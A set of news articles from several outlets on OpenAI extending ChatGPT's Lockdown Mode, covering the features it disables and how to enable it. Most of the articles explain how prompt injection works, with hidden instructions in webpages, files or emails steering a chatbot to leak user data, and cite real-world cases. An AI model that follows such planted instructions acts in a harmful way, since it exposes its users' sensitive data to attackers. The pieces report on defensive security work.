ChatGPT Lockdown Mode rolls out to all users to combat prompt injection attacks and data theft

How ChatGPT's new Lockdown mode protects you from data theft (and what else it does)

Follow ZDNET: Add us as a preferred source on Google. ZDNET's key takeaways * Lockdown mode aims to prevent data theft from attackers. * This mode is now available to all ChatGPT users. * It does limit what you can do on the live web. AIs can be vulnerable to different security threats. And one of the biggest is prompt injection. By feeding malicious commands into your prompts, an attacker could infiltrate your chats, access external files and services, and steal your personal data. An optional setting in ChatGPT called Lockdown mode tries to protect your account by limiting what you can do and where. (Disclosure: Ziff Davis, ZDNET's parent company, filed an April 2025 lawsuit against OpenAI, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.) Also: How indirect prompt injection attacks on AI work - and 6 ways to shut them down First kicked off in February to subscribers of ChatGPT for Enterprise, Edu, Healthcare, and Teachers, Lockdown mode is now also available to all other plans, including Free, Go, Plus, Pro, and Business. Though accessible to everyone who uses ChatGPT, the option is designed for people and organizations that work with sensitive information in need of extra protection. To combat data theft through prompt injection, Lockdown mode limits outbound network requests, such as those to the internet or to an external file service. The idea is to stop any live sensitive information from falling into the hands of an attacker. Also: Use an AI browser? 5 ways to protect yourself from prompt injections - before it's too late The mode doesn't prevent actual prompt injection attacks. A hacker could still infect your prompts with malicious commands that tap into cached web content or uploaded files. Plus, there are some decided tradeoffs, namely those that involve live web searches or information. With Lockdown mode enabled, you can't perform any of the following tasks: * Live web browsing. ChatGPT can't access the live web and instead is limited to cached content. That means any search results may be out of date or even unavailable. * View images from the web. ChatGPT can't display images in regular responses or retrieve them from the live web. You can still upload your own images and ask the AI to generate an image. * Deep research. Deep research is unavailable. * Agent mode. Agent mode is also unavailable. * Canvas networking. You can't use code that you generate through the Canvas tool to access your network. * File downloads. ChatGPT can't download files to analyze them, though it can still handle any files you upload. With these restrictions in mind, you may still want to try Lockdown mode if you're working with highly sensitive or confidential data, either personally or professionally. Just keep in mind that you'll be limited with any requests that need access to the live web or a live file service. Lockdown mode is in the process of rolling out, so it may not yet be accessible to all accounts. To enable it on your end, make sure you're signed in to ChatGPT with your account. Click your account name in the lower left and select Settings. At the Settings window, select Security, scroll down to the section for Advanced Security, and then turn on the switch for Lockdown Mode. A pop-up window explains the restrictions of this mode. To proceed, click the Turn on button.

OpenAI Rolls Out Lockdown Mode to Fight Prompt Injection Attacks

The new feature promises increased protection against these types of attacks, but you'll have to sacrifice a lot of functionality, including live web browsing and image retrieval from the web. As LLM use has skyrocketed in recent years, researchers are increasingly identifying prompt injection attacks as a critical security issue, with such attacks growing in prevalence year-on-year. These are attacks where a bad actor misleads an AI model by injecting malicious instructions into a conversation. Hackers may hide instructions inside content that an AI processes, for example, a PDF file or website, with the ultimate aim of extracting valuable company data. Now, OpenAI is rolling out Lockdown Mode, an optional security setting that limits its products' ability to connect to the web or external services. It does this by limiting outbound network requests, though at the expense of disabling or limiting some useful features. This means that, in a worst-case scenario, if you do encounter malicious prompts, ChatGPT may not be able to share any data with third parties, acting as a final line of defence. There are, however, some pretty significant trade-offs you'll need to make for the added security. Once enabled, web browsing is limited to accessing only cached content, meaning you'll have limited access to freshly updated web pages. Meanwhile, ChatGPT may not display images in regular responses or retrieve images from the web, but you can still upload image files and generate your own images. In addition, ChatGPT won't be able to download files for data analysis, and users cannot approve Canvas-generated code to access the network. Deep Research and Agent Mode will also be disabled, and you won't be able to put ChatGPT into Developer Mode. Though Lockdown Mode is available for all account types and workspaces, OpenAI says it's only intended for users and organizations handling sensitive data. If you think the trade-offs are worth the security benefits and you'd like to enable Lockdown Mode, head to Settings. Then select Security and, under Advanced Security, turn on Lockdown Mode. Finally, select Turn On when the tool asks you to confirm. OpenAI notes that while the new feature is designed to "substantially reduce" the risk of successful prompt injection-based data exfiltration in its products, it does not guarantee protection against newly discovered techniques or combinations of methods. The risks of prompt injection attacks continue to plague new products coming out of the AI industry. In August 2025, researchers at Anthropic were able to compromise users of its Claude for Chrome browser extension with a 23.6% success rate via prompt injections while the product was still in beta. Meanwhile, that same month, researchers from Brave demonstrated that Perplexity's Comet AI browser was vulnerable to these types of attacks.

ChatGPT just gave Free users a powerful defense against prompt injection attacks

* OpenAI's Lockdown Mode blocks live outbound network requests to stop LLM hijacking attempts. * It disables or limits features that make external calls, trading some functionality for privacy. * Lockdown Mode is now rolling out to Free, Plus, Pro, Go, and self-serve Business ChatGPT accounts. The world of cybersecurity was almost totally reshaped with the introduction of LLMs. We saw both hackers and security experts use the new tech to develop bigger and better programs to fight one another, and the battle is still escalating to this day. However, the rise of AI also created a new world of attacks where hackers are hijacking LLMs to do their bidding. OpenAI's Lockdown Mode was an answer to these attacks, but it wasn't available to everyone; at least, until today. Now, the company is allowing everyone, even Free users, to stay safe while using ChatGPT. ChatGPT's Lockdown Mode arrives for all users It's good to have if you're worried about privacy Back in February, OpenAI published a blog post detailing what Lockdown Mode is. Basically, when someone sends an AI to perform a task on the web, malicious actors can sometimes 'lace' their webpages and materials with prompts. These attempt to 'hijack' the AI and have it send personal data to the attacker, all without the user knowing. To solve this, Lockdown Mode was introduced. When enabled, it prevents ChatGPT from making live outbound network requests. As such, if a bad actor tries to trick your LLM into surrendering your personal data, Lockdown Mode will step in and stop ChatGPT from sending anything over. It also disables or limits specific features that depend on outbound requests, but it's good if you're privacy-minded. When Lockdown Mode first released, it was only available to select users. Now, the blog post has been updated to read the following: Lockdown Mode is rolling out to personal ChatGPT accounts as well as self-serve ChatGPT Business accounts. First introduced for ChatGPT enterprise plans, Lockdown Mode is an optional setting for people and teams who want a more conservative ChatGPT experience when working with sensitive information or connected features. The Lockdown Mode documentation explicitly confirms that "Free, Go, Plus, and Pro, and self-serve ChatGPT Business accounts" can now use it. It may take a while for it to fully roll out, but you can check if you have it by going to ChatGPT's Settings, then Security. You should see Lockdown Mode under the Advanced Security section with a toggle. ChatGPT can now remember you better by dreaming about you while it "sleeps" It's much better at recalling past facts now. Posts 1 By Simon Batt

OpenAI rolls out a Lockdown Mode for extra protection against prompt injection attacks - Engadget

OpenAI has begun rolling out Lockdown Mode, an optional security setting designed to offer users advanced protection from prompt injection attacks. For the unfamiliar, prompt injection is a form of social engineering that is specific to conversational chatbots. As AI systems have become better at pulling information from the internet, people have begun hiding malicious instructions on webpages and other places to try and trick those systems. OpenAI is billing Lockdown Mode as a sort of last line of defense against prompt injections, building on the robust protections that it says it already offers through ChatGPT, its models and backend systems. "Lockdown Mode is not intended for everyone," OpenAI explains. "It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection." To that end, enabling Lockdown Mode limits some of the features OpenAI offers through ChatGPT and its other products. For instance, you can still use image generation and upload photos to ChatGPT, but it may not pull images from the internet or display any images inside of a response. The chatbot also cannot download files to analyze, though you can still manually upload documents if you want its insight. Other features, such as Deep Research and Agent Mode are disabled completely. "Lockdown Mode does not change memory, file uploads, the ability to share a conversation, or whether your conversations may be used to improve models," OpenAI adds. "Many of these settings are separately configurable by workspace admins." The company also notes Lockdown Mode won't stop prompt injections from appearing in content ChatGPT processes. Instead, it's designed to prevent an attacker from extracting sensitive data from your account by limiting network requests that someone could exploit. Lockdown Mode is available to all personal accounts, including those using ChatGPT through OpenAI's free tier. To activate it, open ChatGPT's settings menu and select Safety and security. Under Advanced security, tap Lockdown mode and flip on the toggle. You can temporarily disable the additional protection by selecting Manage from the status message that appears above the chat window and selecting Turn off for this chat. Separately, OpenAI is rolling out an active session manager that allows users to see any devices or browsers that have been used to access their account. From there, the company offers the option to log out of individual or all sessions at once. Just note the latter can take up to 30 minutes to complete. "If you suspect unauthorized account activity, change your password if you use one, review your sign-in methods, and contact OpenAI Support," the company adds.

ChatGPT can be hijacked without you knowing. Lockdown Mode is the fix

Lockdown Mode restricts features like live web browsing and Deep Research across all ChatGPT plans, though OpenAI acknowledges risks from uploaded files remain. OpenAI has launched a new security feature in ChatGPT called Lockdown Mode, designed to provide additional protection against so-called "prompt injection attacks." A prompt injection attack is when someone crafts a deceptive prompt in an attempt to trick the LLM into following malicious instructions and/or revealing sensitive information. These deceptive prompts are often hidden within web pages and other data sources, which are easily missed by humans but still read and processed by LLMs. Prompt injection attacks have been used to do all sorts of things, like hijacking Perplexity's AI browser, controlling smart home devices via Google Gemini, and stealing personal information via compressed images and Google Calendar. First announced back in February, Lockdown Mode will now restrict and/or disable several ChatGPT features when enabled, including live web browsing (in favor of cached content), the retrieval and display of web-based images, Deep Research, and Agent Mode. OpenAI emphasizes that this feature can't completely eliminate the risk of prompt injection attacks, as malicious instructions could always be present in uploaded files or cached content. As of this writing, Lockdown Mode is rolling out to all ChatGPT account types, including Free, Go, Plus, and Pro plans. If you aren't seeing Lockdown Mode in your settings, it may not have rolled out to you yet and you'll have to wait a bit longer for it.

The best new ChatGPT feature is one most people will never use

For years, the biggest conversation around AI has been what these tools can do. They can browse the web, analyze documents, connect to your apps, conduct research, and increasingly act on your behalf. But as AI systems become more capable, another question has become harder to ignore: what happens when an AI assistant is tricked into handing over information it shouldn't? OpenAI's new Lockdown Mode is its latest answer to that problem. Available across all ChatGPT account types, Lockdown Mode is an optional security setting designed for people and organizations handling sensitive information. The trade-off is that you get stronger protection against certain forms of data theft, but you lose access to some of ChatGPT's most powerful features. This new security feature makes ChatGPT a homebody Lockdown Mode primarily exists to reduce the risk of data exfiltration from prompt injection attacks. Prompt injection has emerged as one of the most difficult security challenges in the AI era. Instead of attacking software directly, malicious instructions are hidden inside documents, websites, spreadsheets, emails, or other content that an AI system might process. If the model follows those hidden instructions, an attacker may be able to manipulate its behavior. Recommended Videos OpenAI is careful to point out that Lockdown Mode does not stop prompt injections from appearing in content. A malicious instruction could still exist inside an uploaded file or cached webpage. What Lockdown Mode aims to prevent is the final, potentially most damaging step: getting sensitive information out. To accomplish that, OpenAI dramatically restricts what ChatGPT can communicate with outside its own environment. Once enabled, live web browsing is essentially shut down. ChatGPT can only access cached content, which means search results may be limited, outdated, or unavailable altogether -- Deep Research disappears, Agent Mode is disabled, and network access through Canvas-generated code is blocked. ChatGPT also loses the ability to download files for analysis. While users can still upload images and create AI-generated visuals where supported, ChatGPT won't be able to fetch images from the web or display them in normal responses. So, Lockdown Mode turns ChatGPT from a highly connected AI assistant into something much more isolated. A feature most people will never need That's not a criticism. In fact, one of the most interesting things about Lockdown Mode is how openly OpenAI acknowledges that it isn't designed for everyone. But security professionals have long accepted that stronger protection usually comes at the expense of convenience. The closest comparison is probably Apple's "Lockdown Mode," introduced several years ago. Apple built it for people at risk of highly sophisticated cyberattacks, not average iPhone owners. OpenAI appears to be taking a similar approach here. For users dealing with highly sensitive information, limiting network requests can be worth the sacrifice. If an AI system cannot freely interact with external services, there are simply fewer opportunities for confidential information to leave the environment. The move also reflects a broader shift happening across the AI industry. Earlier conversations centered around whether AI could access more data and more services. Increasingly, companies are asking how much access these systems should have in the first place. That question becomes especially important as AI assistants gain the ability to browse websites, connect to business software, read internal documents, and perform actions across multiple services. OpenAI's answer isn't to eliminate those capabilities. Instead, it's offering users a choice. The rise of AI security controls Lockdown Mode is perhaps most notable for what it says about the future of AI products. For years, software security has largely focused on protecting people from malicious programs. AI introduces a different challenge: protecting AI systems from malicious information. That's a much messier problem. A prompt injection can be hidden in a webpage, embedded inside a document, or disguised as normal text. Detecting every possible attack is difficult, which is why OpenAI describes prompt injection as an ongoing research challenge rather than a solved problem. Lockdown Mode acknowledges that reality. Rather than claiming complete protection, it reduces the potential damage if something slips through existing defenses. For enterprise customers, the feature becomes even more granular. Workspace administrators can create custom Lockdown Mode roles, restrict apps and connectors, and carefully decide which actions employees are allowed to perform. OpenAI also recommends limiting write-enabled integrations, since they create opportunities for information to leave trusted environments. In many ways, Lockdown Mode feels like a sign of where AI security is heading. The more powerful AI assistants become, the more users will need tools to dial back their powers when the situation demands it. That may not be as exciting as a new reasoning model or an AI agent that can book your flights. But for organizations handling sensitive information, it could be far more important. Sometimes the smartest AI isn't the one that can do everything. It's the one that knows when not to.

OpenAI Says New Lockdown Mode Can Help Prevent Sensitive Data Leaks

Lockdown Mode cannot be used simultaneously with Developer Mode OpenAI has announced a new security feature for ChatGPT to safeguard users and organisations from prompt injection attacks. Dubbed Lockdown Mode, it is an optional setting within the AI chatbot that is claimed to protect sensitive user data from being exposed. As per the company, it is available across all ChatGPT account types and workspaces, including personal, business, and enterprise accounts. Lockdown Mode restricts several ChatGPT capabilities that rely on internet access or external services when enabled. OpenAI's Lockdown Mode Feature OpenAI says Lockdown Mode is designed to reduce the risk of data exfiltration by limiting outbound network requests that could be used to transfer data to an attacker. On its support page, the company emphasised that the feature does not prevent prompt injections from appearing in content processed by ChatGPT, but focuses on blocking the unauthorised transfer of information. claiming it to be one of the most critical stages of an attack. Prompt injection attacks, notably, happen when malicious instructions are hidden within content processed by an AI model, such as web pages, files, or documents. Such instructions can influence a chatbot's behaviour and potentially trick it into revealing sensitive information. When Lockdown Mode is enabled, several ChatGPT features that are linked to the internet become restricted. For instance, the live web browsing is limited to cached content, while Deep Research and Agent Mode are completely unavailable. Apart from this, ChatGPT also loses the ability to download files for data analysis, although manual upload will continue to work. The company notes that during such instances, search results may be incomplete or outdated. Lockdown Mode is also claimed to affect how apps, connectors, and external integrations function. While synced experiences will continue to work for personal accounts and self-serve ChatGPT Business accounts, live connector access and write actions are blocked. Meanwhile, shopping-agent features and financial integrations will also be unavailable while Lockdown Mode is active. The San Francisco-based company further revealed that Lockdown Mode does not affect memory, conversation sharing, image generation, or whether chats are used to improve its AI models. It also does not impact network access within Codex. Lockdown Mode cannot be used simultaneously with Developer Mode, as enabling one feature automatically disables the other. How to Enable Lockdown Mode in ChatGPT Users with eligible personal accounts or self-serve ChatGPT Business subscriptions can enable Lockdown Mode directly from the Settings menu. Here's how: Lockdown Mode is rolling out to eligible personal accounts, including Free, Go, Plus, and Pro, and self-serve ChatGPT Business accounts.

OpenAI rolls out Lockdown Mode for users handling sensitive information

OpenAI has launched Lockdown Mode to combat prompt injection attacks, a security feature designed for users handling sensitive data. This mode restricts live web browsing and image retrieval from the internet, aiming to prevent data exfiltration by limiting outbound network requests. It is available to eligible personal and business accounts. OpenAI has introduced a new security feature called Lockdown Mode, aimed at reducing the risk of prompt injection attacks that can expose sensitive information. According to the company, the feature is not intended for all users. Instead, it is "designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection." The feature works by limiting certain capabilities that could potentially be exploited by attackers. When enabled, Lockdown Mode disables live web browsing, meaning ChatGPT can only access cached web content. It also turns off the retrieval and display of images from the internet, although users can still generate images. Deep Research and Agent Mode are also unavailable while the setting is active. OpenAI said the feature is being rolled out to eligible personal accounts, including Free, Go, Plus and Pro users, as well as self-serve ChatGPT Business accounts. What is prompt injection? "Prompt injection is a type of social engineering attack specific to conversational AI," according to OpenAI's website. "Prompt injections occur when a third-party -- not the user nor the AI -- misleads the model by injecting malicious instructions into the conversation context." In simple terms, prompt injection is similar to phishing. Just as a scam email may try to trick a person into revealing sensitive information, a prompt injection attempts to manipulate an AI system into carrying out actions or revealing data it should not. OpenAI stressed that Lockdown Mode does not stop prompt injections from appearing in content processed by ChatGPT. "For example, a prompt injection could appear in cached web content or in an uploaded file, and could still affect the behaviour or accuracy of a response," it said. The goal, instead, is to make it harder for sensitive information to be transferred to attackers by restricting outbound network requests. The company also noted that Lockdown Mode does not affect memory, file uploads, conversation sharing, or whether chats may be used to improve models. How to activate For eligible personal accounts and self-serve ChatGPT Business accounts: * Go to Settings. * Select Security. * Under Advanced security, turn on Lockdown Mode. * In the confirmation window, select Turn on. OpenAI said Lockdown Mode and Developer Mode cannot be used together. Enabling one automatically disables the other. When Lockdown Mode is active, a status message appears above the composer. Users can temporarily disable it for a specific chat through the Manage option or the more-options menu, and re-enable it later if needed.

Inside ChatGPT's New Lockdown Mode: Is Your Data Safer?

Sam Altman's OpenAI tops the headlines with the announcement of its new security mode, called Lockdown mode. In the same vein of "security," the AI product is receiving mixed reactions from techies. * Make Telecom Talk My Trusted Source OpenAI's Lockdown Mode - What Does it Do? As per the announcement by the San Francisco-based giant, the new security mode was introduced to strengthen security settings, especially for users and organizations that use their LLM to handle sensitive information. This safeguard mode will detect and protect against attempts to expose sensitive data to the wrong hands. OpenAI-owned ChatGPT also gets an added feature called the "Active Session Manager" tool. Using this tool, users can view logged-in devices and even browsers, and can remotely sign out from their account from devices that are not needed. "Lockdown Mode is not intended for everyone. It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection." OpenAI stated. This mode comes into place as there has been an increase in the trend of "prompt injection attacks". Also Read: OPPO Find X9 Ultra, Find X9s Ditch AI Monopoly: Uses Gemini, Perplexity, and OpenAI Together What are Prompt Injection Attacks? Rather than going directly and exfiltrating data, hackers have now developed a new method where attackers can hide instructions like code documents inside a webpage and upload it to the LLM, and while going through the codes or documents, the attackers are able to manipulate the AI system and get access to sensitive information.

OpenAI Unveils Lockdown Mode to Protect Data from Prompt Injection Attacks

The issue of prompt injection attacks has been discussed for several months now with cybersecurity experts warning of massive data thefts via this vulnerability Six months after cautioning the world about the dangers of a potential prompt injection attack on AI browsers, including its own ChatGPT Atlas, OpenAI has now announced a new feature that it claims would provide additional protection against such instances. The company says that the new Lockdown Mode would disable live web browsing, the retrieval and display of images from the web, deep research, and potential agentic modes. In other words, once the lockdown is initiated, users won't be able to access cached content. Prompt injection attacks use malicious chatbot instructions hidden in webpages and other content types. Lockdown Mode is an optional advanced security setting that limits many tools and capabilities in OpenAI products that can connect to the web or external services. It is designed to reduce the risk of data exfiltration from prompt injection attacks by limiting outbound network requests, at the expense of disabling or limiting some useful features, the company said in a post. However, OpenAI warns that even with the Lockdown Mode turned on, its AI chatbot could remain vulnerable to prompt injections that appears "in cached web content or in an uploaded file, and could still affect the behaviour or accuracy of a response." However, the goal of the new release is to reduce such likelihood and sensitive data getting shared in the process. "Lockdown Mode is not intended for everyone. It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection," OpenAI says, while noting that it is rolling down Lockdown Mode to self-serve ChatGPT Business Accounts and eligible personal accounts. In an earlier note, OpenAI had described the threat of prompt injections. "Prompt injection is a type of social engineering attack specific to conversational AI. Early AI systems were conversations between a single user and a single AI agent. "In AI products today, conversations may include content from many sources, including the internet. Prompt injections occur when a third-party -- not the user nor the AI -- misleads the model by injecting malicious instructions into the conversation context," the note said. Just as phishing emails or scams on the web try to trick people into giving away sensitive information, prompt injections try to trick AIs into doing something you did not ask for, OpenAI had said while noting that the company was building layered defences designed to carry out the user's intended task even when someone is trying to mislead them.

OpenAI Rolls Out Lockdown Mode to Reduce Prompt Injection Risks

OpenAI has begun rolling out a new security feature called 'Lockdown Mode' across its products, making the feature available to eligible Free, Go, Plus, Pro, and self-serve ChatGPT Business accounts. The company said the optional setting targets people and organisations that handle sensitive information and seek stronger protection against data exfiltration risks linked to prompt-injection attacks. The feature restricts several web-connected capabilities, including Deep Research, Agent Mode, and live web browsing. However, OpenAI acknowledged that the feature is not a complete solution. In its FAQ, the company said Lockdown Mode is designed to "substantially reduce the risk of prompt injection-based data exfiltration" but "does not guarantee data exfiltration cannot happen". OpenAI added that risks may still arise through third-party apps that remain enabled, cached data, unforeseen combinations of capabilities, or newly discovered attack techniques. What is prompt injection? Prompt injection is a technique in which attackers hide malicious instructions inside content that an AI system reads, such as webpages, documents, emails, PDFs, or database records. If the model follows those instructions, it may ignore its original directions, reveal sensitive information to attackers, perform unintended actions, or generate misleading outputs. What Lockdown Mode restricts: OpenAI said that Lockdown Mode disables or limits several features that can connect to the web or external services. * Live web browsing: ChatGPT can access only cached content, which may be limited or outdated. * Deep Research: Disabled. * Agent Mode: Disabled. * Image support: ChatGPT may not retrieve or display images from the web, although users can still upload and generate images. * Canvas networking: Users cannot approve Canvas-generated code for internet access. * File downloads: ChatGPT cannot download files for analysis, though manually uploaded files continue to work. * Live connector access and connector write actions: Restricted for personal and self-serve Business accounts. * Shopping agent and Finance experiences: These features are unavailable in Lockdown Mode. At the same time, OpenAI clarified that Lockdown Mode does not change memory settings, file uploads, conversation sharing, or how the company uses conversations to improve its models. How Lockdown Mode works and app risk categories: OpenAI said Lockdown Mode builds on existing protections such as sandboxing, URL-based data exfiltration safeguards, monitoring systems and enterprise controls. Rather than blocking prompt injections outright, it aims to prevent the final stage of an attack by limiting outbound network requests that could transfer sensitive information to an attacker. The company also categorised apps and actions by risk level: * High risk: Read or write actions involving untrusted apps. OpenAI advised users to enable only trusted applications. * High risk: Write actions in trusted apps where the visibility of resulting actions is broad or uncertain. * Medium risk: Sync connectors that do not make live network requests but can still expose sensitive data already synced with OpenAI. * Medium risk: Read actions in trusted apps. These do not create side effects but can still expose sensitive information. * Medium risk: Write actions in trusted apps with limited visibility. OpenAI recommends enabling these only when users are confident that trusted parties alone can see any resulting actions. Why does this matter? OpenAI said prompt injection is "not currently a major risk," yet security researchers increasingly view it as one of the most serious threats facing AI systems. OWASP ranks prompt injection as the top security risk for LLM applications, warning that attackers can hide malicious instructions in websites, documents or emails that AI models later process. In one case, a user tricked a Chevrolet dealership chatbot into selling them a car for $1. The UK's National Cyber Security Centre (NCSC) has also warned that prompt injection attacks may never be fully mitigated because LLMs do not inherently distinguish between instructions and data.